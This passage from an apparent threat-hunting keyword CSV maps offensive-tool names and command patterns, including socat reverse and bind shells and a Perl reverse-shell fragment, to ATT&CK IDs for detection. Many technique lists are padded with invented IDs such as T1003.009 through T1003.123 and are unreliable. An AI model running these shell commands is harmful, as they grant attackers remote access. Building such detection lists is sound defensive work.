T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*SnaffCore/TreeWalk*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*Snaffler.csproj*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*Snaffler.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*snaffler.exe*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*snaffler.exe*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*snaffler.log*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*Snaffler.sln*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*Snaffler.sln*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*SnafflerMessage.cs*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*SnafflerMessageType.cs*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*SnaffPoint.exe*","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","1","N/A","7","2","191","19","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z" +"*SnaffPoint-main*","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","1","N/A","7","2","191","19","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z" +"*snallygaster*","offensive_tool_keyword","snallygaster","Finds file leaks and other security problems on HTTP servers.snallygaster is a tool that looks for files accessible on web servers that shouldn't be public and can pose a security risk.","T1595.001 - T1210","TA0007 - TA0009","N/A","N/A","Information Gathering","https://github.com/hannob/snallygaster","1","0","N/A","N/A","10","2009","240","2023-07-31T07:26:19Z","2018-04-10T12:01:16Z" +"*sneaky_gophish*","offensive_tool_keyword","gophish","Hiding GoPhish from the boys in blue","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/puzzlepeaches/sneaky_gophish/","1","1","N/A","10","10","135","38","2022-12-06T11:58:00Z","2021-06-24T12:41:54Z" +"*SniffAir*","offensive_tool_keyword","SniffAir","SniffAir is an open-source wireless security framework which provides the ability to easily parse passively collected wireless data as well as launch sophisticated wireless attacks. SniffAir takes care of the hassle associated with managing large or multiple pcap files while thoroughly cross-examining and analyzing the traffic. looking for potential security flaws. Along with the prebuilt queries. SniffAir allows users to create custom queries for analyzing the wireless data stored in the backend SQL database. SniffAir is built on the concept of using these queries to extract data for wireless penetration test reports. The data can also be leveraged in setting up sophisticated wireless attacks included in SniffAir as modules.","T1530 - T1170 - T1059 - T1201","TA0002 - TA0003 - TA0007 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Tylous/SniffAir","1","1","N/A","N/A","10","1161","175","2020-10-14T04:00:27Z","2017-02-20T18:32:32Z" +"*sniffer.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*sniffer-master.zip*","offensive_tool_keyword","sniffer","A modern alternative network traffic sniffer.","T1040 - T1052.001 - T1046 - T1552.002","TA0011 - TA0007 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/chenjiandongx/sniffer","1","1","N/A","N/A","7","668","58","2022-07-27T15:13:57Z","2021-11-08T15:36:03Z" +"*SnifferSpoofer*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*sniffglue*","offensive_tool_keyword","sniffglue","Secure multithreaded packet sniffer","T1040 - T1041 - T1046 - T1057 - T1071.001","TA0009 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/kpcyrd/sniffglue","1","0","N/A","N/A","10","970","89","2022-07-13T22:44:18Z","2017-09-12T16:26:24Z" +"*snmp_default_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*snmp-check * -c public*","greyware_tool_keyword","snmpcheck","automate the process of gathering information of any devices with SNMP protocol support. like snmpwalk - snmpcheck allows you to enumerate the SNMP devices and places the output in a very human readable friendly format. It could be useful for penetration testing or systems monitoring","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","http://www.nothink.org/codes/snmpcheck/index.php","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*snmpwalk -v1 -cpublic *","greyware_tool_keyword","snmpwalk","allows you to enumerate the SNMP devices and places the output in a very human readable friendly format","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://wiki.debian.org/SNMP","1","0","greyware tool - risks of False positive !","5","10","N/A","N/A","N/A","N/A" +"*snmpwalk * public *1.3.6.1.*","greyware_tool_keyword","snmpwalk","allows you to enumerate the SNMP devices and places the output in a very human readable friendly format","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://wiki.debian.org/SNMP","1","0","greyware tool - risks of False positive !","5","10","N/A","N/A","N/A","N/A" +"*snmpwalk -c public -v 1 *","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*snmpwalk -c public -v 2c *","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*snmpwalk -c public -v1 *","greyware_tool_keyword","snmpwalk","allows you to enumerate the SNMP devices and places the output in a very human readable friendly format","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://wiki.debian.org/SNMP","1","0","greyware tool - risks of False positive !","5","10","N/A","N/A","N/A","N/A" +"*snmpwn *passwords.txt*","offensive_tool_keyword","snmpwn","SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. allowing us to cycle through large lists of users to find the ones that do","T1210 - T1212 - T1558","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hatlord/snmpwn","1","0","N/A","N/A","3","222","50","2020-08-23T10:41:38Z","2016-06-16T10:31:13Z" +"*snmpwn.rb* --hosts *","offensive_tool_keyword","snmpwn","SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. allowing us to cycle through large lists of users to find the ones that do.","T1210 - T1212 - T1558","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hatlord/snmpwn","1","0","N/A","N/A","3","222","50","2020-08-23T10:41:38Z","2016-06-16T10:31:13Z" +"*socat *","offensive_tool_keyword","socat","socat is a relay for bidirectional data transfer between two independent data channels. Each of these data channels may be a file. pipe. device","T1048 - T1055 - T1562","TA0003 - TA0002 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/craSH/socat","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*socat exec:*","greyware_tool_keyword","socat","Shell spawning socat usage ","T1059 - T1105 - T1046","TA0002 - TA0008 - TA0007","N/A","N/A","shell spawning","https://linuxfr.org/news/socat-un-outil-en-ligne-de-commande-pour-maitriser-vos-sockets","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*socat FILE:*tty*raw*echo=0 TCP*:*","greyware_tool_keyword","socat","socat bind shell","T1071 - T1573","TA0002 - TA0011","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*socat file:*tty*raw*echo=0 tcp-listen:*","greyware_tool_keyword","socat","socat reverse shell","T1071 - T1573","TA0002 - TA0011","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*socat -O /tmp/*","greyware_tool_keyword","socat","Shell spawning socat usage ","T1059 - T1105 - T1046","TA0002 - TA0008 - TA0007","N/A","N/A","shell spawning","https://linuxfr.org/news/socat-un-outil-en-ligne-de-commande-pour-maitriser-vos-sockets","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*socat TCP4-LISTEN:* fork TCP4:*:*","greyware_tool_keyword","socat","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Network Exploitation tools","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*socat tcp4-listen:1337*","offensive_tool_keyword","socat","listening on port 1337 -observed in variousmalware and poc explitation tools","T1049 - T1021.001 - T1572","TA0002 - TA0011 - TA0040","N/A","N/A","C2","N/A","1","0","N/A","8","6","N/A","N/A","N/A","N/A" +"*socat tcp-connect*","greyware_tool_keyword","socat","Shell spawning socat usage ","T1059 - T1105 - T1046","TA0002 - TA0008 - TA0007","N/A","N/A","shell spawning","https://linuxfr.org/news/socat-un-outil-en-ligne-de-commande-pour-maitriser-vos-sockets","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*socat tcp-connect:*:* exec:*bash -li**pty*stderr*setsid*sigint*sane*","greyware_tool_keyword","socat","socat reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" +"*socat tcp-connect:*:* exec:/bin/sh*","greyware_tool_keyword","socat","socat reverse shell","T1071 - T1573","TA0002 - TA0011","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*socat TCP-LISTEN:**reuseaddr*fork EXEC:/bin/sh*","greyware_tool_keyword","socat","socat bind shell","T1071 - T1573","TA0002 - TA0011","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*Social Engineer Toolkit*","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec. LLC an information security consulting firm located in Cleveland. Ohio.","T1566 - T1059.004 - T1564.001","TA0001 - TA0002 - TA0007","N/A","N/A","Phishing","https://github.com/trustedsec/social-engineer-toolkit","1","0","N/A","N/A","10","9395","2569","2023-08-25T17:25:45Z","2012-12-31T22:01:33Z" +"*social_engineering/web_cloner*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*SocialPwned.git*","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","OSINT exploitation tools","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","9","800","93","2023-08-12T21:59:23Z","2020-04-07T22:25:38Z" +"*socialpwned.py*","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","OSINT exploitation tools","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","9","800","93","2023-08-12T21:59:23Z","2020-04-07T22:25:38Z" +"*socialpwned_*.txt*","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","OSINT exploitation tools","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","9","800","93","2023-08-12T21:59:23Z","2020-04-07T22:25:38Z" +"*socket(S*PF_INET*SOCK_STREAM*getprotobyname(*tcp*))*if(connect(S*sockaddr_in($p*inet_aton($i))))*","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","1","greyware tool - risks of False positive !","N/A","10","6749","1944","2023-10-04T17:30:31Z","2016-12-24T09:48:49Z" +"*SocketHijacking.*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" +"*socks*127.0.0.1 9050*","offensive_tool_keyword","proxychains","(TOR default) 